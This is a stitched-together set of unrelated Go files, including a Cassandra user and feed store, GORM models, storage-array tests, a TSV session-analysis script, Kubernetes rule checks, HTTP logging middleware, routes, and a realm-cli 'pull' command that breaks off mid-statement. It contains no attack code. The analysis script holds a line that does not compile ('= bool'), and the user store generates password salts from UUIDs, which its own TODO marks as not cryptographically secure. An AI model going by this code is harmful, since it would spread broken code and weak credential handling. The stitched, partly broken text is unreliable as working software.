// gocql.ErrNotFound is translated to db.ErrNotFound and is deliberately not
// reported to hystrix as a failure: a missing row is not a service outage.
func (c *cas) CassandraExecWithConsistency(ctx context.Context, name, query string, values []interface{}, dest []interface{}, cons gocql.Consistency) error {
	// zipkin span
	span, ctx := spanutils.NewDatastoreSpan(ctx, name, "Cassandra")
	defer span.Finish()
	span.SetQuery(query)
	span.SetTag("values", values)
	// casError captures the raw gocql error; the closure's return value only
	// controls hystrix's success/failure accounting.
	var casError error
	e := hystrix.Do(name, func() error {
		q := c.casSes.Query(query, values...).Consistency(cons)
		if len(dest) == 0 {
			casError = q.Exec()
		} else {
			casError = q.Scan(dest...)
		}
		// don't count gocql.ErrNotFound in hystrix
		if casError == gocql.ErrNotFound {
			return nil
		}
		return casError
	}, nil)
	if e != nil {
		span.SetError(e.Error())
		return errors.Wrap(e, name)
	}
	if casError == gocql.ErrNotFound {
		return db.ErrNotFound
	}
	return casError
}
// CassandraGetQuery builds (but does not execute) a gocql query at the given
// consistency level, recording the query text and values on a zipkin span.
//
// NOTE(review): the deferred span.Finish fires when this function returns —
// before the caller ever runs the query — and the span-scoped ctx is
// discarded, so the span only covers query construction. Confirm intended.
func (c *cas) CassandraGetQuery(ctx context.Context, name, query string, values []interface{}, cons gocql.Consistency) *gocql.Query {
	// zipkin span
	span, ctx := spanutils.NewDatastoreSpan(ctx, name, "Cassandra")
	defer span.Finish()
	span.SetQuery(query)
	span.SetTag("values", values)
	return c.casSes.Query(query, values...).Consistency(cons)
}
// AddFollowing records that userId follows followingId.
func (c *cas) AddFollowing(ctx context.Context, userId, followingId string) error {
	const name = "AddFollowing"
	const query = "INSERT INTO follow.following (user, following) VALUES (?,?)"
	err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(userId, followingId),
		db.BuildInterface(),
	)
	return errors.Wrap(err, name)
}
// AddFollower records followerId as a follower of userId.
func (c *cas) AddFollower(ctx context.Context, userId, followerId string) error {
	const name = "AddFollower"
	const query = "INSERT INTO follow.follower (user, follower) VALUES (?,?)"
	err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(userId, followerId),
		db.BuildInterface(),
	)
	return errors.Wrap(err, name)
}
// RemoveFollowing deletes the userId -> followingId following edge.
func (c *cas) RemoveFollowing(ctx context.Context, userId, followingId string) error {
	const name = "RemoveFollowing"
	const query = "DELETE FROM follow.following WHERE user= ? AND following = ?"
	err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(userId, followingId),
		db.BuildInterface(),
	)
	return errors.Wrap(err, name)
}
// RemoveFollower deletes followerId from userId's follower set.
func (c *cas) RemoveFollower(ctx context.Context, userId, followerId string) error {
	const name = "RemoveFollower"
	const query = "DELETE FROM follow.follower WHERE user = ? AND follower = ?"
	err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(userId, followerId),
		db.BuildInterface(),
	)
	return errors.Wrap(err, name)
}
// CheckUserName returns the email registered for username; a missing row
// surfaces as the wrapped not-found error from CassandraExec.
func (c *cas) CheckUserName(ctx context.Context, username string) (string, error) {
	const name = "CheckUsername"
	const query = "SELECT email FROM user.users WHERE username = ?"
	var email string
	err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(username),
		db.BuildInterface(&email),
	)
	return email, errors.Wrap(err, name)
}
// CheckEmail returns the stored email matching email; a missing row surfaces
// as the wrapped not-found error from CassandraExec.
func (c *cas) CheckEmail(ctx context.Context, email string) (string, error) {
	const name = "CheckEmail"
	const query = "SELECT email FROM user.users WHERE email = ?"
	var mail string
	err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(email),
		db.BuildInterface(&mail),
	)
	return mail, errors.Wrap(err, name)
}
// CheckLogin verifies username (case-insensitive) and password against the
// stored salted hash and returns the user's profile on success. A wrong
// password yields db.ErrNotFound so callers cannot distinguish it from an
// unknown user.
//
// SECURITY FIX: the original logged the plaintext password and the salt at
// info level; credentials must never reach log output, so that line has been
// removed.
func (c *cas) CheckLogin(ctx context.Context, username, password string, hash func(context.Context, string, string) string) (db.UserInfo, error) {
	username = strings.ToLower(username)
	name := "CheckLogin"
	query := "SELECT id,password,salt,email,firstname,lastname FROM user.users WHERE username = ?"
	var id, pwd, salt, email, firstname, lastname string
	err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(username),
		db.BuildInterface(&id, &pwd, &salt, &email, &firstname, &lastname),
	)
	if err != nil {
		return nil, errors.Wrap(err, name)
	}
	if hash(ctx, password, salt) != pwd {
		return nil, db.ErrNotFound
	}
	return userInfo{
		email:     email,
		firstname: firstname,
		lastname:  lastname,
		username:  username,
		id:        id,
	}, nil
}
// CreateUser inserts a new user row with a generated id and a salted password
// hash, returning the new user's id.
func (c *cas) CreateUser(ctx context.Context, req db.UserInfo, password string, hash func(context.Context, string, string) string) (string, error) {
	const name = "CreateUser"
	const query = "INSERT INTO user.users (id, email, firstname, lastname, username, password, salt) VALUES (?,?,?,?,?,?,?)"
	id := uuid.New()
	salt := uuid.New() // TODO replace with crypto secure salt generation
	hashed := hash(ctx, password, salt)
	if err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(id, req.GetEmail(), req.GetFirstName(), req.GetLastName(), strings.ToLower(req.GetUserName()), hashed, salt),
		db.BuildInterface(),
	); err != nil {
		return "", errors.Wrap(err, name)
	}
	return id, nil
}
// GetUser loads a user's profile fields by id; a missing row surfaces as the
// wrapped not-found error from CassandraExec.
func (c *cas) GetUser(ctx context.Context, userID string) (db.UserInfo, error) {
	const name = "GetUser"
	const query = "SELECT username,email,firstname,lastname FROM user.users WHERE id= ?"
	var username, email, firstname, lastname string
	err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(userID),
		db.BuildInterface(&username, &email, &firstname, &lastname),
	)
	if err != nil {
		return nil, errors.Wrap(err, name)
	}
	return userInfo{
		email:     email,
		firstname: firstname,
		lastname:  lastname,
		username:  username,
		id:        userID,
	}, nil
}
// AddUserFeedItem appends itemId to the user's own feed timeline.
func (c *cas) AddUserFeedItem(ctx context.Context, userId, itemId string, ts time.Time) error {
	return c.addFeedEntry(ctx, userId, itemId, ts, "feed.user")
}

// AddFollowingFeedItem appends itemId to the timeline a user sees from the
// accounts they follow.
func (c *cas) AddFollowingFeedItem(ctx context.Context, userId, itemId string, ts time.Time) error {
	return c.addFeedEntry(ctx, userId, itemId, ts, "feed.following")
}
// addFeedEntry inserts a (user, ts, feed) row into the given feed table.
func (c *cas) addFeedEntry(ctx context.Context, userId, itemId string, ts time.Time, table string) error {
	name := "AddFeedEntry" + table
	query := "INSERT INTO " + table + " (user, ts, feed) VALUES (?,?,?)"
	if err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(userId, ts, itemId),
		db.BuildInterface(),
	); err != nil {
		return errors.Wrap(err, name)
	}
	return nil
}
// CreateFeedItem persists a new feed item under a fresh UUID and returns the
// generated id.
func (c *cas) CreateFeedItem(ctx context.Context, fi db.FeedInfo, ts time.Time) (string, error) {
	const name = "CreateFeedItem"
	const query = "INSERT INTO feed.items (id, actor, verb, cverb, object, target, ts) VALUES (?,?,?,?,?,?,?)"
	id := uuid.New()
	if err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(id, fi.GetActor(), fi.GetVerb(), fi.GetCVerb(), fi.GetObject(), fi.GetTarget(), ts),
		db.BuildInterface(),
	); err != nil {
		return "", errors.Wrap(err, name)
	}
	return id, nil
}
// dbData is the channel payload for streaming queries: an id on success or
// the error encountered while scanning that row.
type dbData struct {
	id  string
	err error
}

// GetError returns the scan error, if any.
func (d dbData) GetError() error {
	return d.err
}

// GetId returns the scanned id.
func (d dbData) GetId() string {
	return d.id
}
// GetFollowers streams the follower ids of userId on the returned channel.
// The channel is closed when the result set is exhausted or ctx is canceled.
// Cleanups versus the original: the dead intermediate dbData value (built but
// never sent) is removed, and the iterator's terminal error — previously
// dropped — is forwarded as a final error-only message.
func (c *cas) GetFollowers(ctx context.Context, userId string) <-chan db.Data {
	name := "GetFollowers"
	query := "SELECT follower FROM follow.follower WHERE user = ?"
	q := c.CassandraGetQuery(
		ctx, name, query,
		db.BuildInterface(userId),
		c.consistency,
	)
	data := make(chan db.Data, 5)
	scanner := q.Iter().Scanner()
	go func() {
		defer close(data)
		for scanner.Next() {
			var follower string
			err := scanner.Scan(&follower)
			select {
			case data <- dbData{id: follower, err: err}:
			case <-ctx.Done():
				// Stop streaming once the caller gives up.
				return
			}
		}
		// Surface any iteration error (connection loss, timeout, ...).
		if err := scanner.Err(); err != nil {
			select {
			case data <- dbData{err: err}:
			case <-ctx.Done():
			}
		}
	}()
	return data
}
// FetchFeed returns up to limit feed-item ids for userId older than before,
// from the user feed or the following feed depending on ftype. The limit is
// defaulted to 20 when negative and capped at 50.
func (c *cas) FetchFeed(ctx context.Context, userId string, before time.Time, ftype int32, limit int) ([]string, error) {
	name := "FetchFeed"
	table := "feed.following"
	if ftype == db.USER_FEED {
		table = "feed.user"
	}
	if limit < 0 {
		limit = 20
	} else if limit > 50 {
		limit = 50
	}
	query := "SELECT feed FROM " + table + " WHERE user = ? AND ts < ? LIMIT " + strconv.Itoa(limit)
	q := c.CassandraGetQuery(
		ctx, name, query,
		db.BuildInterface(userId, before),
		c.consistency,
	)
	feeds := make([]string, 0)
	scanner := q.Iter().Scanner()
	for scanner.Next() {
		feed := ""
		err := scanner.Scan(&feed)
		if err != nil {
			return []string{}, err
		}
		feeds = append(feeds, feed)
	}
	// Fixed: the original never checked the iterator's terminal error, so a
	// partial result after a connection failure looked like a full page.
	if err := scanner.Err(); err != nil {
		return []string{}, err
	}
	return feeds, nil
}
// FetchFeedItem loads a single feed item by id, returning it with the stored
// timestamp converted to a Unix epoch.
//
// NOTE(review): target is scanned from the row but never copied into the
// returned feedInfo — confirm whether feedInfo should carry it.
func (c *cas) FetchFeedItem(ctx context.Context, feedId string) (db.FeedInfo, error) {
	name := "FetchFeedItem"
	query := "SELECT actor, verb, cverb, object, target, ts FROM feed.items WHERE id = ?"
	actor := ""
	verb := ""
	cverb := ""
	object := ""
	target := ""
	ts := time.Time{}
	err := c.CassandraExec(
		ctx, name, query,
		db.BuildInterface(feedId),
		db.BuildInterface(&actor, &verb, &cverb, &object, &target, &ts),
	)
	if err == nil {
		return feedInfo{
			id:     feedId,
			actor:  actor,
			verb:   verb,
			cverb:  cverb,
			object: object,
			ts:     ts.Unix(),
		}, nil
	}
	return nil, errors.Wrap(err, name)
}
// Close tears down the underlying Cassandra session, if one was created.
func (c *cas) Close() {
	if c.casSes == nil {
		return
	}
	c.casSes.Close()
}
// New opens a Cassandra session against the configured hosts and returns a
// client that executes queries at LocalQuorum consistency.
func New(config Config) (Cassandra, error) {
	cluster := gocql.NewCluster(config.Hosts...)
	session, err := cluster.CreateSession()
	if err != nil {
		log.Error(context.Background(), err)
		return nil, errors.Wrap(err, "New Cassandra connection")
	}
	client := &cas{
		casSes:      session,
		consistency: gocql.LocalQuorum,
	}
	return client, nil
}
|
package dalmodel
import (
"github.com/jinzhu/gorm"
)
// Chat is a chat room persisted by GORM; Hashtags is a many-to-many relation
// through the chat_hashtags join table.
type Chat struct {
	gorm.Model
	Hashtags []Hashtag `gorm:"many2many:chat_hashtags;"`
}

// Message stores a message body together with its replies (many-to-many via
// the message_replies join table).
type Message struct {
	gorm.Model
	Text string
	Reply []Reply `gorm:"many2many:message_replies;"`
}

// Reply is a reply body referenced from Message.
type Reply struct {
	gorm.Model
	Text string
}
|
package goxtremio
import (
"fmt"
"testing"
)
// TestGetInitiatorGroupByID fetches an initiator group by its numeric ID.
// Fixed: the *testing.T parameter is now named and used — failures go through
// t.Fatal instead of panic, and output through t.Logf instead of
// fmt.Println(fmt.Sprintf(...)).
func TestGetInitiatorGroupByID(t *testing.T) {
	initiator, err := c.GetInitiatorGroup("4", "")
	if err != nil {
		t.Fatal(err)
	}
	t.Logf("%+v", initiator)
}
// TestGetInitiatorGroupByName fetches an initiator group by its display name.
// Fixed: failures use t.Fatal rather than panic, and output uses t.Logf.
func TestGetInitiatorGroupByName(t *testing.T) {
	initiator, err := c.GetInitiatorGroup("", "VPLEX-ee20")
	if err != nil {
		t.Fatal(err)
	}
	t.Logf("%+v", initiator)
}
// TestGetInitiatorGroups lists all initiator groups.
// Fixed: failures use t.Fatal rather than panic, and output uses t.Logf.
func TestGetInitiatorGroups(t *testing.T) {
	initiators, err := c.GetInitiatorGroups()
	if err != nil {
		t.Fatal(err)
	}
	t.Logf("%+v", initiators)
}
|
package main
import (
"bufio"
"fmt"
"os"
"strconv"
"strings"
"time"
)
// sessionRecord is one learning session parsed from a row of the session TSV.
type sessionRecord struct {
	Idx          int     // slot index within the day (TSV column 9)
	Type         string  // session type (TSV column 10)
	Module       string  // module name (TSV column 14)
	CorrectRatio float64 // ratio of correct answers (TSV column 13)
}
func main() {
t := time.Unix(1558026985, 0)
fmt.Println(t)
fmt.Println(t.Format("2006-01-02"))
f2, _ := os.Open("/Users/yongweixing/dev/darwin_seq/darwin_order.tsv")
defer f2.Close()
orderScanner := bufio.NewScanner(f2)
orderMap := make(map[string]map[string]bool)
for orderScanner.Scan() {
fields := strings.Split(orderScanner.Text(), "\t")
uid := fields[0]
dt := fields[1]
if _, ok := orderMap[uid]; !ok {
orderMap[uid] = make(map[string]bool)
}
orderMap[uid][dt] = bool
}
userData := make(map[string]map[string][]sessionRecord)
loc := time.FixedZone("UTC+3", int((3 * time.Hour).Seconds()))
f, _ := os.Open("/Users/yongweixing/dev/darwin_seq/darwin_session_0517_0617.tsv")
defer f.Close()
scanner := bufio.NewScanner(f)
for scanner.Scan() {
fields := strings.Split(scanner.Text(), "\t")
uid := fields[0]
sessTS, _ := strconv.ParseInt(fields[2], 10, 64)
consumTS, _ := strconv.ParseInt(fields[11], 10, 64)
idx, _ := strconv.Atoi(fields[8])
sessType := fields[9]
correctRatio, _ := strconv.ParseFloat(fields[12], 64)
sessModule := fields[13]
//dateStr := fields[len(fields)-1]
sessTime := time.Unix(int64(sessTS/1000000), 0).In(loc)
consumTime := time.Unix(int64(consumTS/1000000), 0).In(loc)
//t := time.Unix(int64(sessTS/1000000), 0)
if sessTime.Format("2006-01-02") != consumTime.Format("2006-01-02") {
continue
}
date := sessTime.Format("2006-01-02")
sessRecord := sessionRecord{
Idx: idx,
Type: sessType,
Module: sessModule,
CorrectRatio: correctRatio,
}
if _, ok := userData[uid]; !ok {
userData[uid] = make(map[string][]sessionRecord)
}
userData[uid][date] = append(userData[uid][date], sessRecord)
}
userData2 := make(map[string][][]sessionRecord)
firstDate := Date(2019, 5, 17)
for uid, uData := range userData {
userData2[uid] = make([][]sessionRecord, 32)
for d, records := range uData {
days := int(parseToDate(d).Sub(firstDate).Hours() / 24)
if days < 0 {
continue
}
if days > 31 {
continue
}
userData2[uid][days] = append(userData2[uid][days], records...)
}
}
typeCounterByPos := make(map[string]map[int]int)
for _, udata := range userData2 {
for day, records := range udata {
if len(records) == 0 {
continue
}
if day+3 > len(udata)-1 {
continue
}
if len(udata[day+1]) == 0 && len(udata[day+2]) == 0 && len(udata[day+3]) == 0 {
continue
}
for i, r := range records {
if _, ok := typeCounterByPos[r.Type]; !ok {
typeCounterByPos[r.Type] = make(map[int]int)
}
typeCounterByPos[r.Type][i]++
}
}
}
for t, values := range typeCounterByPos {
for pos, c := range values {
if pos > 7 {
continue
}
fmt.Printf("type %v pos %v counter %v\n", t, pos, c)
}
}
// gap := 14
// for uid, uData := range userData2 {
// for start, records := range uData {
// end := start + 14
// if end > len(records)-5 {
// continue
// }
// }
// }
fmt.Println(len(userData))
}
// func getTypeNdaysNumber(srs [][]sessionRecord, n int) map[string]int {
// tn := make(map[string]int)
// if n < 0 || n > len(srs) {
// n = len(srs)
// }
// for _, ss := range srs[len(srs)-n:] {
// for _, s := range ss {
// tn[s.Type]++
// }
// }
// return tn
// }
// func getModuleNdaysNumber(srs [][]sessionRecord, n int) map[string]int {
// mn := make(map[string]int)
// if n < 0 || n > len(srs) {
// n = len(srs)
// }
// for _, ss := range srs[len(srs)-n:] {
// for _, s := range ss {
// mn[s.Module]++
// }
// }
// return mn
// }
// func defaultSlotNumberByNdaysAndRatio(srs [][]sessionRecord, n int) (int, float64) {
// res := 0
// total := 0
// ratio := 0.0
// if n < 0 || n > len(srs) {
// n = len(srs)
// }
// for _, ss := range srs[len(srs)-n:] {
// total += len(ss)
// for _, s := range ss {
// if s.Idx == 0 {
// res += 1
// }
// }
// }
// if total > 0 {
// ratio = float64(res * 1.0 / total)
// }
// return res, ratio
// }
// func getAverageCorrectRatioLatesNDaysByType(srs [][]sessionRecord, n int) map[string]float64 {
// corr := make(map[string]float64)
// nums := make(map[string]int)
// totalRa := make(map[string]float64)
// if n < 0 || n > len(srs) {
// n = len(srs)
// }
// for _, ss := range srs[len(srs)-n:] {
// for _, s := range ss {
// nums[s.Type] += 1
// totalRa[s.Type] += s.CorrectRatio
// }
// }
// for k, v := range nums {
// corr[k] = totalRa[k] / float64(v)
// }
// return corr
// }
func parseToDate(s string) time.Time {
fields := strings.Split(s, "-")
year, _ := strconv.Atoi(fields[0])
month, _ := strconv.Atoi(fields[1])
day, _ := strconv.Atoi(fields[2])
return Date(year, month, day)
}
func Date(year, month, day int) time.Time {
return time.Date(year, time.Month(month), day, 0, 0, 0, 0, time.UTC)
}
|
package discover
import (
"github.com/k8guard/k8guard-discover/rules"
lib "github.com/k8guard/k8guardlibs"
"github.com/k8guard/k8guardlibs/violations"
)
// verify whether a specific annotation(s) exist
// verifyRequiredAnnotations appends a violation to the entity when its
// annotations do not satisfy the configured required-annotation rules.
// Entities ignored for REQUIRED_ANNOTATIONS_TYPE are skipped entirely.
func verifyRequiredAnnotations(annotations map[string]string, entity *lib.ViolatableEntity, entityType string, violation violations.ViolationType) {
	if !rules.IsNotIgnoredViolation(entity.Namespace, entityType, entity.Name, violations.REQUIRED_ANNOTATIONS_TYPE) {
		return
	}
	found, source, _ := rules.IsValuesMatchesRequiredRule(entity.Namespace, entityType, entity.Name, annotations, lib.Cfg.RequiredAnnotations)
	if found {
		return
	}
	entity.Violations = append(entity.Violations, violations.Violation{Source: source, Type: violation})
}
// verify whether a specific label(s) exists
// verifyRequiredLabels appends a violation to the entity when its labels do
// not satisfy the configured required-label rules. Entities ignored for
// REQUIRED_LABELS_TYPE are skipped entirely.
func verifyRequiredLabels(labels map[string]string, entity *lib.ViolatableEntity, entityType string, violation violations.ViolationType) {
	if !rules.IsNotIgnoredViolation(entity.Namespace, entityType, entity.Name, violations.REQUIRED_LABELS_TYPE) {
		return
	}
	found, source, _ := rules.IsValuesMatchesRequiredRule(entity.Namespace, entityType, entity.Name, labels, lib.Cfg.RequiredLabels)
	if found {
		return
	}
	entity.Violations = append(entity.Violations, violations.Violation{Source: source, Type: violation})
}
|
package middleware
import (
"fmt"
"net/http"
"time"
"github.com/sirupsen/logrus"
)
// HTTPRecorder wraps an http.ResponseWriter so the status code and response
// body can be captured and logged after the handler has run.
type HTTPRecorder struct {
	w      http.ResponseWriter // underlying writer; all calls are forwarded to it
	req    *http.Request       // request being served, read when logging
	status int                 // code passed to WriteHeader (0 if WriteHeader was never called)
	body   []byte              // response body captured by Write
	start  time.Time           // request start time — assumed set by the constructor; TODO confirm
}
// Header returns the header map of the wrapped ResponseWriter.
func (r *HTTPRecorder) Header() http.Header {
	return r.w.Header()
}
// Write captures the response body and forwards it to the underlying
// ResponseWriter. Chunks are appended (copying the caller's slice) so that a
// response written in several Write calls is captured in full; the previous
// `r.body = b` kept only the last chunk and aliased the caller's buffer.
func (r *HTTPRecorder) Write(b []byte) (int, error) {
	r.body = append(r.body, b...)
	return r.w.Write(b)
}
// WriteHeader records the status code for later logging and forwards it to
// the wrapped ResponseWriter.
func (r *HTTPRecorder) WriteHeader(statusCode int) {
	r.status = statusCode
	r.w.WriteHeader(statusCode)
}
// LogRequest logs the inbound request line (method, URI, protocol) together
// with the Host, Connection and User-Agent headers.
func (r *HTTPRecorder) LogRequest() {
	headers := fmt.Sprintf(
		"Host: %q Connection: %q User-Agent: %q",
		r.req.Host,
		r.req.Header.Get("Connection"),
		r.req.Header.Get("User-Agent"),
	)
	logrus.Infof("%s %s %s %s", r.req.Method, r.req.RequestURI, r.req.Proto, headers)
}
// LogResponse writes a single log line for the completed request. Responses
// with an error-class status (>= 400) are logged at error level together
// with the captured body; everything else is logged at info level. The old
// condition (status > http.StatusOK) wrongly treated 201/204/3xx responses
// as errors, contradicting the "if error" intent.
func (r *HTTPRecorder) LogResponse() {
	// log response body if error
	if r.status >= http.StatusBadRequest {
		logrus.Errorf("[%d] %s %q %s", r.status, r.req.RequestURI, string(r.body), time.Since(r.start))
		return
	}
	logrus.Infof("[%d] %s %s", r.status, r.req.RequestURI, time.Since(r.start))
}
|
package routes
import (
"github.com/gorilla/mux"
"github.com/huf0813/pembukuan_tk/ctr"
"github.com/huf0813/pembukuan_tk/middleware"
"net/http"
)
// Route aggregates every controller plus the token-auth middleware needed
// to assemble the application's HTTP router.
type Route struct {
	HomeCTR     ctr.HomeCTR
	AuthCTR     ctr.AuthCTR
	UserCTR     ctr.UserCTR
	ProductCTR  ctr.ProductCTR
	InvoiceCTR  ctr.InvoiceCTR
	CustomerCTR ctr.CustomerCTR
	AdminCTR    ctr.AdminCTR
	Auth        middleware.TokenMiddleware // wraps protected endpoints with user/admin token checks
}
// RouteInterface is implemented by anything that can build the app router.
type RouteInterface interface {
	Routes() *mux.Router
}
// Routes builds the application's HTTP router: public endpoints first, then
// user-token-protected endpoints, then admin-token-protected endpoints.
func (r *Route) Routes() *mux.Router {
	router := mux.NewRouter()

	// user registers a handler behind the user-token middleware.
	user := func(path string, h http.HandlerFunc, method string) {
		router.Handle(path, r.Auth.TokenMiddlewareIsUser(h)).Methods(method)
	}
	// admin registers a handler behind the admin-token middleware.
	admin := func(path string, h http.HandlerFunc, method string) {
		router.Handle(path, r.Auth.TokenMiddlewareIsAdmin(h)).Methods(method)
	}

	// public endpoints
	router.HandleFunc("/", r.HomeCTR.Welcome).Methods("GET")
	router.HandleFunc("/login", r.AuthCTR.Login).Methods("POST")
	router.HandleFunc("/token/expired", r.AuthCTR.CheckToken).Methods("POST")

	// user endpoints
	user("/dashboard", r.UserCTR.DashboardUser, "GET")
	user("/customers", r.CustomerCTR.CustomerRegister, "POST")
	user("/customers/delete", r.CustomerCTR.DeleteCustomer, "POST")
	user("/customers", r.CustomerCTR.FetchCustomers, "GET")
	user("/customers", r.CustomerCTR.EditCustomer, "PUT")
	user("/products", r.ProductCTR.GetProducts, "GET")
	user("/products", r.ProductCTR.AddProduct, "POST")
	user("/products/delete", r.ProductCTR.DeleteProduct, "POST")
	user("/products", r.ProductCTR.EditProduct, "PUT")
	user("/products/stock", r.ProductCTR.AddProductStock, "POST")
	user("/invoice", r.InvoiceCTR.AddNewInvoice, "POST")
	user("/invoice", r.InvoiceCTR.GetInvoices, "GET")
	user("/invoice/detail", r.InvoiceCTR.GetInvoiceByID, "POST")
	user("/statistics", r.InvoiceCTR.GetStatistics, "POST")

	// admin endpoints
	admin("/admin/dashboard", r.AdminCTR.DashboardAdmin, "GET")
	admin("/admin/customers", r.CustomerCTR.CustomerRegister, "POST")
	admin("/admin/customers/delete", r.CustomerCTR.DeleteCustomer, "POST")
	admin("/admin/customers", r.CustomerCTR.FetchCustomers, "GET")
	admin("/admin/customers", r.CustomerCTR.EditCustomer, "PUT")
	admin("/admin/products", r.ProductCTR.GetProducts, "GET")
	admin("/admin/products", r.ProductCTR.AddProduct, "POST")
	admin("/admin/products/delete", r.ProductCTR.DeleteProduct, "POST")
	admin("/admin/products", r.ProductCTR.EditProduct, "PUT")
	admin("/admin/products/stock", r.ProductCTR.AddProductStock, "POST")
	admin("/admin/invoice", r.InvoiceCTR.AddNewInvoice, "POST")
	admin("/admin/invoice", r.InvoiceCTR.GetInvoices, "GET")
	admin("/admin/invoice/detail", r.InvoiceCTR.GetInvoiceByID, "POST")
	admin("/admin/users", r.UserCTR.FetchUsers, "GET")
	admin("/admin/users", r.UserCTR.AddUser, "POST")
	admin("/admin/users/delete", r.UserCTR.DeletedUser, "POST")
	admin("/admin/users", r.UserCTR.EditedUser, "PUT")
	admin("/admin/statistics", r.InvoiceCTR.GetStatistics, "POST")

	return router
}
|
package pull
import (
"archive/zip"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"github.com/10gen/realm-cli/internal/cli"
"github.com/10gen/realm-cli/internal/cli/user"
"github.com/10gen/realm-cli/internal/cloud/realm"
"github.com/10gen/realm-cli/internal/local"
"github.com/10gen/realm-cli/internal/terminal"
"github.com/10gen/realm-cli/internal/utils/flags"
)
// Names of the dependency-related flags accepted by the `pull` command.
const (
	flagIncludeNodeModules  = "include-node-modules"
	flagIncludePackageJSON  = "include-package-json"
	flagIncludeDependencies = "include-dependencies" // deprecated alias for include-node-modules
)
// CommandMeta is the command meta for the `pull` command (usage string,
// aliases, and the help text shown by the CLI).
var CommandMeta = cli.CommandMeta{
	Use:         "pull",
	Aliases:     []string{"export"},
	Description: "Exports the latest version of your Realm app into your local directory",
	HelpText: `Pulls changes from your remote Realm app into your local directory. If
applicable, Hosting Files and/or Dependencies associated with your Realm app will be
exported as well.`,
}
// Command is the `pull` command; it holds the resolved user inputs.
type Command struct {
	inputs inputs
}
// Flags is the command flags accepted by `pull`: the local destination and
// remote app selectors, the dependency/hosting export toggles, a dry-run
// switch, frontend template selection, and the shared project/config-version
// flags.
func (cmd *Command) Flags() []flags.Flag {
	return []flags.Flag{
		// --local: directory to export the app into.
		flags.StringFlag{
			Value: &cmd.inputs.LocalPath,
			Meta: flags.Meta{
				Name: "local",
				Usage: flags.Usage{
					Description: "Specify a local filepath to export a Realm app to",
				},
			},
		},
		// --remote: which remote app to export.
		flags.StringFlag{
			Value: &cmd.inputs.RemoteApp,
			Meta: flags.Meta{
				Name: "remote",
				Usage: flags.Usage{
					Description: "Specify the name or ID of a remote Realm app to export",
				},
			},
		},
		// --include-node-modules: export deps as a node_modules archive.
		flags.BoolFlag{
			Value: &cmd.inputs.IncludeNodeModules,
			Meta: flags.Meta{
				Name: flagIncludeNodeModules,
				Usage: flags.Usage{
					Description: "Export and include Realm app dependencies from a node_modules archive",
					Note:        "The allowed formats are as a directory or compressed into a .zip, .tar, .tar.gz, or .tgz file",
				},
			},
		},
		// --include-package-json: export deps as a package.json file.
		flags.BoolFlag{
			Value: &cmd.inputs.IncludePackageJSON,
			Meta: flags.Meta{
				Name: flagIncludePackageJSON,
				Usage: flags.Usage{
					Description: "Export and include Realm app dependencies from a package.json file",
				},
			},
		},
		// TODO(REALMC-10088): Remove this flag in realm-cli 3.x
		// --include-dependencies/-d: deprecated alias of --include-node-modules.
		flags.BoolFlag{
			Value: &cmd.inputs.IncludeDependencies,
			Meta: flags.Meta{
				Name:      flagIncludeDependencies,
				Shorthand: "d",
				Usage: flags.Usage{
					Description: "Export and include Realm app dependencies from a node_modules archive",
					Note:        "The allowed formats are as a directory or compressed into a .zip, .tar, .tar.gz, or .tgz file",
				},
				Deprecate: fmt.Sprintf("support will be removed in v3.x, please use %q instead", flagIncludeNodeModules),
			},
		},
		// --include-hosting/-s: also export hosting files.
		flags.BoolFlag{
			Value: &cmd.inputs.IncludeHosting,
			Meta: flags.Meta{
				Name:      "include-hosting",
				Shorthand: "s",
				Usage: flags.Usage{
					Description: "Export and include Realm app hosting files",
				},
			},
		},
		// --dry-run/-x: report what would be written without touching disk.
		flags.BoolFlag{
			Value: &cmd.inputs.DryRun,
			Meta: flags.Meta{
				Name:      "dry-run",
				Shorthand: "x",
				Usage: flags.Usage{
					Description: "Run without writing any changes to the local filepath",
				},
			},
		},
		// --template/-t: frontend template IDs to export alongside the app.
		flags.StringSliceFlag{
			Value: &cmd.inputs.TemplateIDs,
			Meta: flags.Meta{
				Name:      "template",
				Shorthand: "t",
				Usage: flags.Usage{
					Description:   "Specify the frontend Template ID(s) to export.",
					Note:          "Specified templates must be compatible with the remote app",
					AllowedValues: realm.AllowedTemplates,
				},
			},
		},
		cli.ProjectFlag(&cmd.inputs.Project),
		cli.ConfigVersionFlag(&cmd.inputs.AppVersion, "Specify the app config version to export as"),
	}
}
// Inputs is the command inputs resolver for `pull`.
func (cmd *Command) Inputs() cli.InputResolver {
	return &cmd.inputs
}
// Handler is the command handler. It resolves the remote app (and any
// frontend templates), exports the app as a zip, and — unless --dry-run —
// writes the backend (and optional dependencies, hosting assets, and
// template frontends) under the destination path.
func (cmd *Command) Handler(profile *user.Profile, ui terminal.UI, clients cli.Clients) error {
	app, err := cmd.inputs.resolveRemoteApp(ui, clients)
	if err != nil {
		return err
	}
	// Only template-based apps have client templates to pull.
	var clientTemplates []clientTemplate
	if app.TemplateID != "" {
		clientTemplates, err = cmd.inputs.resolveClientTemplates(clients.Realm, app.GroupID, app.ID)
		if err != nil {
			return err
		}
	}
	pathProject, zipPkg, err := cmd.doExport(profile, clients.Realm, app.GroupID, app.ID)
	if err != nil {
		return err
	}
	// App path
	// Confirm before writing into an existing directory.
	proceed, err := checkPathDestination(ui, pathProject)
	if err != nil {
		return err
	} else if !proceed {
		return nil
	}
	pathRelative, err := filepath.Rel(profile.WorkingDirectory, pathProject)
	if err != nil {
		return err
	}
	// Template apps are split into frontend/ and backend/ subdirectories;
	// plain apps are written directly at the project path.
	var pathFrontend string
	pathBackend := pathProject
	if len(clientTemplates) != 0 {
		pathFrontend = filepath.Join(pathProject, local.FrontendPath)
		pathBackend = filepath.Join(pathProject, local.BackendPath)
	}
	// Dry run: describe what would have been written, then stop.
	if cmd.inputs.DryRun {
		logs := make([]terminal.Log, 0, 3)
		logs = append(logs, terminal.NewTextLog("No changes were written to your file system"))
		if len(clientTemplates) != 0 {
			logs = append(logs,
